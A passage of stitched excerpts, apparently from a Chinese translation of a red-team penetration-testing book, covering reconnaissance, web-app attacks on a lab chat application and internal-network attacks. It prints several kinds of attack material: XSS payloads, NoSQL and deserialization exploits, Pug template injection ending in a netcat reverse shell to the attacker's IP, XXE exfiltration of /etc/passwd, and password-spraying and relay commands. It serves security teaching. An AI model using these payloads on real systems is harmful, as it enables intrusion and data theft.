text
stringlengths
64
2.99M
未知 第2章 发球前——红队侦察 在本书上一版中,这一章重点介绍如何使用不同的工具,如Recon-NG、Discover、Spiderfoot、Gitrob、Masscan、Sparta、HTTP屏幕截图、漏洞扫描和Burp Suite等工具。
/usr/bin/nmap -T4 -oX/opt/nmap_diff/scan_$d.xml 10.100.100.0/24 > /dev/null 2>&1。 if [ -e/opt/nmap_diff/scan_$y.xml ]; then。 /usr/bin/ndiff/opt/nmap_diff/scan_$y.xml/opt/nmap_diff/scan_$d.xml >/opt/nmap_ diff/diff.txt。
例如,如果您使用AWS云服务(AWS云服务在全球范围内拥有巨大的IP地址范围),那么根据选择的区域,您的服务器可能被设置在/13掩码地址范围内。
针对网络安全猫公司IP地址的范围开展扫描,我们可以看到证书中的主机名,.int是内部服务器,.dev是研发主机,vpn是VPN服务器等,如图2.5所示。
我强烈建议您将此代码作为基础,将所有主机名保存到数据库,开发网站前端交互界面,连接可能具有证书的其他端口,例如8443等,甚至可能会挖掘一些漏洞,例如.git/.svn类型漏洞。
因此,如果您想了解cyberspacekittens.com子域名,那么利用Knock工具获取下面网址的字典,并查看是否存在[subdomain] .cyberspacekittens.com子域名。
随着网站的信息被抓取,通过分析带有链接的文件,我们就可以获取很多网站的公共资源,这意味着我们可以使用搜索引擎完成这些烦琐的工作。
我们看到的是,许多开发人员要么将代码推送到错误的仓库(将其发送到公共存储库而不是公司的私有存储库),要么不小心推送了敏感材料(如密码),然后尝试将其删除。
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2。 cd /opt/bucket_finder。 ./bucket_finder.rb --region us my_words -download。
aws configure 查看CyberSpaceKittens的S3容器的权限。 aws s3api get-bucket-acl --bucket cyberspacekittens 从S3容器中读取文件。 aws s3 ls s3://cyberspacekittens 下载S3容器中的所有内容。 aws s3 sync s3://cyberspacekittens 在查询S3容器之后,接下来要测试的是该容器的写入权限。
例如,您注册名为testlab.s3.amazonaws.com的S3 Amazon容器。 然后,您的公司的子域名testlab.company.com指向testlab.s3.amazonaws.com。 一年后,您不再使用S3容器,并取消了testlab.s3.amazonaws.com注册,但忘记了testlab.company.com的别名记录的重定向配置。 现在有人可以访问AWS并重新申请testlab.s3.amazon.com,并在被攻击者的域上拥有有效的S3容器。
这可能需要运行很长时间,因为SimplyEmail工具会检索Bing、Yahoo、Google、Ask Search、PGP Repos和文件等,如图2.13所示。 这也可能使您的网络看起来像搜索引擎的机器人,由于SimplyEmail工具会发起非常多的搜索请求,因此可能需要验证码。
图3.2 在运行自己开发的漏洞利用程序之前,对于漏洞悬赏项目,有一点需要注意的是,我看到在一些案例中,研究人员在发现漏洞后,后续操作已不局限于验证漏洞。
举例说明,在找到SQL注入漏洞后,转储整个数据库,在接管子域名后用个人认为有趣的内容修改页面,甚至执行远程代码漏洞后,在生产环境中横向渗透。
由于这是在您自己的主机系统上托管的网站应用程序,因此需要在攻击者Kali系统上创建主机名记录。 在攻击者Kali虚拟机上编辑主机文件,通过主机名或者IP地址指向被攻击的应用程序。
图3.4 在盲目攻击网站之前,了解应用程序可以帮助您找到更好的方法。 对于那些可能配备网站应用程序防火墙的目标站点,了解应用程序同样会帮助您隐蔽更多的攻击行为。
XSS静荷混淆/多语言 目前,标准的XSS静荷仍然可以正常运行,但我们确实会发现应用程序阻止某些字符,或者在应用程序前面有网站应用防火墙。
<b onmouseover=alert('XSS')>Click Me!</b>。 <svg onload=alert(1)>。 <body onload="alert('XSS')">。 <img src="http://test.cyberspacekittens.com"onerror=alert(document.cookie);>。
正如您所看到的,尝试在应用程序中查找各种XSS漏洞很烦琐,这是因为静荷的参数受代码功能、不同类型的HTML标记、应用程序类型和不同类型的过滤机制影响。
/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/ </scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e。
从红队的角度来看,BeEF是一个很好的工具,可用于各类攻击行动中,包括跟踪用户、捕获凭据、执行单击劫持和钓鱼攻击。 即使不用在攻击场景,BeEF也是一个很好的工具,可以展示XSS漏洞的巨大危害。
<script src="http://<Your IP>:3000/hook.js"></script> 查看位于http://127.0.0.1:3000/hook.js上的hook.js文件,您将看到很长的、像是JavaScript的混淆代码。
一旦在目标应用程序上找到XSS漏洞,不要使用原始的alert(1)样式静荷,您可以修改<script src="http://<Your IP>:3000/hook.js"></script>静荷来利用此漏洞。
由于该数据的结果只能由管理员手动查看,因此请求用户是看不到的,如果应用程序存在XSS漏洞,则攻击者不会立即看到“alert(1)”的攻击效果。
图3.11 3.3.8 Node.js中的高级跨站脚本攻击 XSS漏洞反复出现的一个重要原因是,仅通过过滤标签或某些字符的方式很难防范该攻击方式。
\- var title = "This is the HTML Title" \- var THP = "Hack the Planet" h1 #{title} p The Hacker Playbook will teach you how to #{THP} 注意,#{THP}是THP之前分配变量的占位符。
<h1>This is the HTML Title</h1> <p>The Hacker Playbook will teach you how to Hack the Planet</p> 幸运的是,在这种情况下,我们使用“#{}”字符串插值,这是Pug插值的转义版本。
{},非转义字符串插值 #{},虽然转义字符串插值是转义的,但是,如果直接通过JavaScript传递它,仍然可能存在XSS漏洞 在JavaScript中,未转义的缓冲区代码以“!
&#x3C; script&#x3E; alert(1)&#x3C;/script&#x3E; 图3.12 单击提交后,查看页面源代码(<Ctrl + U>组合键)并搜索单词“alert”,您将看到静荷的特殊字符转换为HTML实体。
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[]) [!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() 如您所知,许多浏览器已开始集成XSS防护机制。
虽然有很多不同的方式实现这个目标,但我们通常会发现,如果可以在内容管理系统(CMS)或类似设备中找到用户-管理员类型的XSS,那么就能够完全突破系统。
在传统的SQL注入中,攻击者会尝试跳出SQL查询,并在服务器端修改查询操作。 使用NoSQL注入,攻击可以在应用程序的其他区域中执行,而不是在传统的SQL注入中执行。 此外,在传统的SQL注入中,攻击者会使用标记来跳出语句。 在NoSQL注入攻击中,NoSQL漏洞通常是由于字符串解析或者赋值操作造成的。 NoSQL注入中漏洞通常在以下情况下发生:向NoSQL数据库提出请求,端点接收JSON数据;
这个JSON对象的含义是运算符($gt)大于NULL ("")。 由于逻辑上所有内容都大于NULL,因此JSON对象始终是正确的,允许我们绕过或注入NoSQL查询。
图3.15 在聊天应用程序中,我们看到对/loginnosql端点进行身份验证期间,POST数据中包含{“username”:“admin”,“password”,“GuessingAdminPassword”}。
将POST请求更改为{“username”:“admin”, “password”:TRUE},使得请求始终正确,并以管理员身份登录而不需要知道密码,复制了SQLi中1=1攻击方式。
username=admin&password[$gt] 服务器端请求转换变成如下形式。 {"username":"admin", "password":{"$gt":""} 这看起来类似于之前的NoSQLi攻击。
我们在BlackHat上看到了很多不同的讨论,内容主要是挖掘了Jenkins和Apache Struts 2等常见应用程序中的序列化关键漏洞,同时出现了大量反序列化研究项目ysoserial。
1.Node.js中的反序列化 很多时候,挖掘复杂的漏洞需要深入了解应用程序。 在这个场景中,Node.js聊天应用程序使用存在漏洞的serialize.js版本。
这个库存在漏洞,易受攻击,原因是不受信任的数据传递给unserialize()函数,可以被利用,执行任意代码,具体操作是将中间调用函数表达式(IIFE)传递给JavaScript对象。
图3.18 其次,我们需要创建一个序列化静荷,静荷将被反序列化,并通过eval运行,同时JavaScript静荷需要运行 ('child_process').exec('ls')。
{"thp":"_$$ND_FUNC$$_function (){require('child_process').exec('DO SYSTEM COMMANDS HERE', function(error, stdout, stderr) {console.log(stdout) });}()"}。
在burp中代理流量并查看Cookie值,如图3.19所示。 图3.19 找到一个Cookie名称“donotdecodeme”。 将该Cookie复制到Burp Suite解码器中,对其进行Base64解码,如图3.20所示。
{"thp":"_$$ND_FUNC$$_function(){require('child_process').exec('DO SYSTEM COMMANDS HERE',function(error, stdout, stderr) { console.log(stdout) });}()"} 示例如下。 {"thp":"_$$ND_FUNC$$_function(){require('child_process').exec('echo node deserialization is awesome!! >>/opt/web/chatSupportSystems/public/hacked.txt', function(error, stdout, stderr) { console.log(stdout) });}()"} 由于原始 Cookie 已经编码,因此我们需要使用 Burp 解码器/编码器对静荷进行base64编码。 示例静荷,如图3.21所示 eyJ0aHAiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7cmVxdWlyZSgnY 2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2VjaG8gbm9kZSBkZXNlcmlhbGl6YX Rpb24gaXMgYXdlc29tZSEhID4+IC9vcHQvd2ViL2NoYXRTdXBwb3J0U3lz dGVtcy9wdWJsaWMvaGFja2VkLnR4dCcsIGZ1bmN0aW9uKGVycm9yLCBz dGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9 注销,打开Burp拦截,并转发请求/(home)。
图3.21 如图3.22所示,在node-serialize模块的源代码中,我们看到这个函数表达式正在被计算,用户输入可能被执行,对于任何JavaScript/Node.js应用程序来说,这都是一个严重的问题。
这是一个段落缩进 这仍然是段落标记的一部分 以下是 HTML 和Pug模板的示例,如图 3.23所示。 图3.23 上面的示例文本显示了模版在HTML中的排版以及模版在Pug Markup语言中的排版。
http://chat:3000/ti?user=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&co mment=&link= 图 3.24 所示表明应用程序存在XSS漏洞,但是可以与模板系统进行交互吗?
图3.24 在Burp历史记录中,查看服务器请求/响应,指向端点数据包/ti?user=,并将请求发送到Burp Repeater(<Ctrl + R>组合键),如图3.25所示。
(1)正如前文所述,Pug是用空格分隔的(类似于Python),换行符用于输入一个新的模板,这意味着如果跳出Pug中的当前行,就可以执行新的模板代码。
[newline]=9\*9 URL编码: GET/ti?user=%0a%3d9*9&comment=&link= (4)/ti?user =%0a%3d9 * 9在响应正文中输出了81,如图3.27所示。
[new line]=globa 使用Burp的解码器工具将上述表达式进行URL编码,可以得到:%0a%3d %20%67%6c%6f%62%61%6c 使用上面的URL编码字符串作为用户值并重新发送。
全局中的每个变量和索引 p = index URL编码: %0a%65%61%63%68%20%76%61%6c%2c%69%6e%64%65%78%20%69%6e% 20%67%6c%6f%62%61%6c%0a%20%20%70%3d%20%69%6e%64%65%78 在上面的示例中,我们使用‘each’迭代器,它可以访问值,并且如果指定数组或对象,也可以访问索引。
- var x = global.process.mainModule.require p= index URL编码: %0a%65%61%63%68%20%76%61%6c%2c%69%6e%64%65%78%20%69%6e %20%67%6c%6f%62%61%6c%2e%70%72%6f%63%65%73%73%0a%20%20 %70%3d%20%69%6e%64%65%78 我们尝试在所有可用的方法中选择“process”,因为它最终会执行 require,如图3.30所示。
图3.30 global.process.mainModule的每个变量和索引 p= index URL编码: %0a%65%61%63%68%20%76%61%6c%2c%69%6e%64%65%78%20%69 %6e%20%67%6c%6f%62%61%6c%2e%70%72%6f%63%65%73%73%2e%6d %61%69%6e%4d%6f%64%75%6c%65%0a%20%20%70%3d%20%69%6e%64 %65%78 远程执行代码。
- var x = global.process.mainModule.require - x('child_process').exec('cat/etc/passwd >>/opt/web/chatSupportSystems/ public/accounts.txt') URL编码: %0a%2d%20%76%61%72%20%78%20%3d%20%67%6c%6f%62%61%6c%2e %70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65 %2e%72%65%71%75%69%72%65%20%0a%2d%20%78%28%27%63%68%69 %6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28 %27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%3e %3e%20%2f%6f%70%74%2f%77%65%62%2f%63%68%61%74%53%75%70 %70%6f%72%74%53%79%73%74%65%6d%73%2f%70%75%62%6c%69%63 %2f%61%63%63%6f%75%6e%74%73%2e%74%78%74%27%29 在上面的示例中,我们像在JavaScript中一样定义变量“x”,但行首的破折号表示无缓冲输出(隐藏)。
cd /opt/tplmap ./tplmap.py -u "http://chat:3000/ti?user=*&comment=asdfasdf&link=" 图3.32 3.3.13 JavaScript和远程代码执行 在每次安全评估和Web应用程序渗透测试中,我们尽可能实现远程执行代码。
虽然远程执行代码几乎会出现在任何地方,但是常见于上传WebShell、Imagetragick漏洞利用、使用Office文件开展XXE攻击、目录遍历结合上传功能实现关键文件替换等过程。
-var x = global.process.mainModule.require -x('child_process').exec('nc [Your_IP] 8888 -e/bin/bash') 通过Burp工具,查看上传文件的请求和响应数据包,如图3.35所示。
图3.36 3.3.14 服务器端请求伪造(SSRF) 服务器端请求伪造(SSRF)通常容易被误解,并且在表述方面,经常与跨站点请求伪造(CSRF)混为一谈。
接下来发生的事情是服务器创建一个全新的请求,访问Imgur站点,抓取图像(可能会执行一些图像操作以调整图像大小—imagetragick),将其保存到服务器,并给用户发送成功消息。
如您所见,我们提供了一个URL,服务器获取该URL并获得图像,然后将其上传到数据库。 我们最初向 Web 应用程序提供URL,以便从外部资源获取配置文件图片。
网站服务器运行在80端口,如果我们尝试连接到http://127.0.0.1:8080(这是一个除本地主机之外,其他主机无法访问的端口),会发生什么情况?
如果我们能得到完整的HTTP请求/响应数据包,而且可以在本地对端口8080发出GET请求,那么如果我们发现易受攻击的Jenkins或Apache Tomcat服务,会发生什么?
在“Link”文本框中,输入http://cyberspacekittens.com网站,然后单击预览链接。 您现在应该看到http://cyberspacekittens.com呈现的页面,但URI栏仍应指向聊天应用程序。
如果打开浏览器访问网址:http://chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:28017,就可以利用SSRF漏洞访问MongoDB网站界面,如图3.41所示。
要访问 serverStatus(http://chat: 3000/serverStatus?text=1),如图3.42所示,您必须使用SSRF攻击方法并跳转到下面的网址。 图3.42 http://chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:28017/serverStatus? text=1。
3.3.15 XML eXternal Entities(XXE) XML 是可扩展标记语言的缩写,主要用于发送/存储易于理解的数据。 XML eXternal Entities(XXE)是指应用程序中XML解析器漏洞。
表3.1 正常 XML 文件 恶意 XML 文件 <?xml version="1.0" encoding="ISO- 8859-1"?> <Prod> <Type>Book</type> <name>THP</name> <id>100</id> </Prod> <?xml version="1.0" encoding="utf- 8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <xxx>&xxe;</xxx> 上面,我们有一个普通的XML文件和一个定制的读取系统的/etc/passwd内容的XML文件。
<?xml version="1.0" ?> <!DOCTYPE thp [ <!ELEMENT thp ANY> <!ENTITY book "Universe"> ]> <thp>Hack The &book;</thp> 在这个例子中,指定XML版本为1.0,DOCTYPE指定根元素是thp,!ELEMENT指定任何类型,并且!ENTITY设置book字符串“Universe”。
表3.2 原始 XML 文件 恶意 XML 文件 <?xml version="1.0" ?> <!DOCTYPE thp [ <!ELEMENT thp ANY> <!ENTITY book "Universe"> ]> <thp>Hack The &book;</thp> <?xml version="1.0" ?> <!DOCTYPE thp [ <!ELEMENT thp ANY> <!ENTITY book SYSTEM "file:///etc/passwd"> ]> <thp>Hack The &book;</thp> XXE实验——读取文件 拦截流量并在[IP of Your VM]/xxe.php中单击“Hack the XML”。
<?xml version="1.0" ?><!DOCTYPE thp [ <!ELEMENT thp ANY><!ENTITY book SYSTEM "file:///etc/passwd">]><thp>Hack The %26book%3B</thp> 请注意%26等同于&,%263B等同于;
<!ENTITY % dtd SYSTEM "http://[Your_IP]/payload.dtd"> %dtd; 新的数据POST静荷显示如下(请记住改变[Your_IP])。 <?xml version="1.0"?><!DOCTYPE thp [<!ELEMENT thp ANY><!ENTITY % dtd SYSTEM "http://[YOUR_IP]/payload.dtd">%dtd;]><thp><error>%26send%3B </error> </thp> 在攻击者服务器上创建名为payload.dtd的文件。 gedit/var/www/html/payload.dtd <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % all "<!ENTITY send SYSTEM'http://[Your_IP]:8888/collect= %file;'>"> %all; 刚刚创建的DTD文件的作用是从存在XXE漏洞的服务器读取/etc/passwd,然后将敏感数据通过Web请求回传到攻击者主机。
nc -l -p 8888 您可能看到以下错误内容:simplexml_load_string(): parser error : Detected an entity reference loop in <b>/var/www/html/xxe.php</b> on line <b>20。
运行NetCat监听器,修改payload.dtd文件来启用这个功能,如图3.44所示。 <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource= file:///etc/passwd"> <!ENTITY % all "<!ENTITY send SYSTEM'http://[Your_IP]:8888/collect=%file;'>"> %all; 图3.44 在重新发送新修改的请求后,我们现在可以看到被攻击者服务器首先读取payload.dtd文件,处理该文件,并向端口8888上的NetCat监听程序发送第二个Web请求。
未知 第4章 带球——突破网络 在评估开始的第二天,您使用Nmap工具扫描整个网络,不走运地启动了漏洞扫描程序,但是没有在任何网站应用程序中发现突破口。
您知道,一旦可以进入网络,就可以使用大量的技巧获取更多的凭证,在设备之间迁移,利用活动目录存在的漏洞,找到我们都渴望的网络空间“战利品”。
当公司开始连接互联网时,我们开始了解身份验证技术,应用于电子邮件(ieOffice 365或OWA)、通信(Lync、XMPP、WebEx)工具、协作工具(JIRA、Slack、Hipchat、Huddle),以及其他外部服务(Jenkins、CMS站点、支持站点)。
我们尝试攻击这些服务器/服务的原因是,我们正在寻找根据被攻击者的轻量目录访问协议(LDAP)/活动目录(AD)基础架构进行身份验证的应用程序。
正如您将在下面的示例中看到的那样,我们运行Spray工具,攻击cyberspacekittens公司的虚假OWA邮件服务器(实际上根本存在),当它尝试用户名peter和密码Spring2018时,身份认证通过了(您可以通过数据长度判断是否成功),如图4.1所示。
这是一个使用Curl工具快速脚本实现的OWA系统暴力破解 图4.1 我经常遇到的一个问题是尝试使用哪些密码,因为在锁定账户之前,您只能进行有限次数的密码尝试。
POST/owa/auth.owa HTTP/1.1 Host: mail.cyberspacekittens.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://mail.cyberspacekittens.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.cyberspacekittens.com%2fowa%2f Cookie: ClientId=VCSJKT0FKWJDYJZIXQ; PrivateComputer=true; PBack=0 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencodeddestination=https%3A%2F%2Fcyberspacekittens. com%2Fowa%2F&flags=4 &forcedownlevel=0&username= sprayuser @cyberspacekittens.com&pass word= spraypassword &passwordText=&isUtf8=1 如前所述,spray.sh的另一个优点是它支持SMB和Lync协议。
图4.2 找到单个密码后,我们就可以使用Ruler工具,转储O365全局地址列表(GAL)中的所有用户,从而查找更多的电子邮件地址及其所属的电子邮件组,如图4.3所示。
通常,在红队行动中,我们不希望在环境中运行任何漏洞扫描工具,甚至有时不想运行Nmap工具对内部网络进行扫描,这是因为许多公司的安全防护设备能够检测这些类型的扫描,并且很容易发现漏洞扫描程序的扫描动作。
设置环境——实验网络 这部分是完全可选的,但是,由于微软公司版权许可问题,本书中没有任何预先安装的虚拟机实验环境,因此现在由您来建立一个“实验室”!
确保为每个设备添加一个域用户,该域用户在设备中以本地管理员身份运行。 这可以通过将该域用户添加到本地计算机的本地管理员组来完成。 在每台主机上启用本地管理员并设置密码。
4.3 在没有凭证的网络上 4.3.1 Responder 就像之前的行动,我们使用Responder工具(可在GitHub网站搜索)监听网络和欺骗响应数据,从而获取网络上的凭证。
回顾本书第2版的内容,当网络上的系统查找DNS主机名失败时,该被攻击者系统将链路本地多播名称解析(LLMNR)和Net-BIOS(NBT-NS)名称服务用于名称解析备份。
更棒的是,Responder 工具可以更进一步,充当 Web 代理自动发现(WPAD)协议服务器,通过攻击者服务器代理所有的数据,但这是另外一种攻击方式。
NTLMv2-SSP散列值暴力破解的速度,比普通的NTLM散列值慢得多,但这不是大问题,因为我们可以使用大型破解设备实现破解(参见第8章)。
图4.5 图4.6 4.3.2 更好的Responder(MultiRelay.py) Responder工具和破解NTLMv2-SSP散列的问题在于破解这些散列值所需的时间可能很长。
在Per Laurent的网站上,Responder的工具文件夹中包含MultiRelay工具,它是一个强大的渗透测试程序,使您能够对选定的目标执行NTLMv1和NTLMv2中继攻击。
/opt/Responder/tools ./MultiRelay.py -t <target host> -c <shell command> -u ALL 一旦中继到被攻击者主机的目标实现,如图4.7所示,就需要考虑在被攻击者主机上执行的内容。
默认情况下,MultiRelay可以生成基本Shell,但我们也可以自动执行Meterpreter PowerShell静荷、Empire PowerShell静荷、dnscat2 PowerShell静荷、PowerShell下载脚本和执行C2代理、Mimikatz,或者只运行calc.exe工具。
4.4 没有凭证的用户枚举 一旦进入网络,我们就可以使用Responder工具获取凭证或Shell,但有时也会出现这种情况——目标启用SMB签名并且破解NTLMv2 SSP不可行。
nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm= "cyberspacekittens. local",userdb=/opt/userlist.txt<Domain Controller IP>。
4.5 使用CrackMapExec(CME)扫描网络 如果还没有突破的系统,但我们确实通过Responder、配置错误的网络应用程序、暴力破解或打印机获得了凭证,那么可以尝试扫描网络,查看账户可以登录的位置。 使用像CrackMapExec(CME)等工具进行简单的扫描,可以帮助找到内部网络初始突破点。 从已经取得的效果看,我们使用CME扫描网络,识别/验证网络上的SMB资源,在多个主机上远程执行命令,甚至通过Mimikatz提取明文凭证。
在下面的场景中,我们将使用其REST API启动Empire,在CME中配置密码,将CME连接到Empire,使用掌握的单个凭证扫描网络,最后,如果通过身份鉴权,则自动推送Empire静荷到远程被攻击者的系统,如图4.9所示。
cd /opt/Empire ./empire --rest –password 'hacktheuniverse' 更改CrackMapExec密码。 gedit /root/.cme/cme.conf password=hacktheuniverse 运行CME,生成Empire Shell。
cme smb 10.100.100.0/24 –d 'cyberspacekittens.local' –u '<username>' – p '<password>' - M empire_exec -o LISTENER = http 4.6 突破第一台主机 通过社会工程、潜伏设备、Responder工具、攻击打印机或其他攻击方式,您获得了主机的访问权限,您接下来要做什么?
sysinfo Get-WmiObject -class win32 operatingsystem | select -property * | exportcsv c:\ temp \ os.txt wmic qfe get Caption,Description,HotFixID,InstalledOn 简单文件搜索。
powershell -Command "get-WmiObject -class Win32_Share" powershell -Command "get-PSDrive" powershell -Command "Get-WmiObject -Class Win32_MappedLogicalDisk | select Name,ProviderName" 其实绝大部分人并没有时间记住所有这些命令,幸运的是我们有 RTFM 一书(很棒的资源),leostat创建了一个快速的Python脚本,包含大量这样的命令,可以在一个名为rtfm.py的工具中轻松搜索。